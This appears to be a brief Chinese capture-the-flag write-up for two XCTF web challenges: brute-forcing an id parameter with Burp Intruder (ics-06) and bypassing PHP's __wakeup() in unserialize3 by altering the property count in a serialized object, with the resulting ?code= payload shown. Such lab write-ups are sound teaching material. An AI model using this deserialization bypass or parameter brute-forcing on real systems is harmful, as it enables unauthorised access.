ics-06

使用burpsuite intruder或写脚本遍历id参数,id=2333时爆出flag

使用burp intruder

unserialize3

反序列化漏洞,绕过wakeup(),详细参见
https://mp.weixin.qq.com/s?biz=MzUzNTkyODI0OA==&mid=2247492379&idx=1&sn=1a0f8b4aa7e61472ac2983397af20f92&chksm=fafcafcccd8b26da56a645fa1931f7b593699add7fad8b384cd00ba92a98cf7875ad1214f90a&mpshare=1&scene=1&srcid=#rd

1
2
3
4
5
6
7
8
<?php
class xctf{
    public $flag='111';
}

$a = serialize(new xctf);
echo $a;
?>

得到O:4:”xctf”:1:{s:4:”flag”;s:3:”111”;}

改成O:4:”xctf”:2:{s:4:”flag”;s:3:”111”;}

然后访问?code=O:4:”xctf”:2:{s:4:”flag”;s:3:”111”;}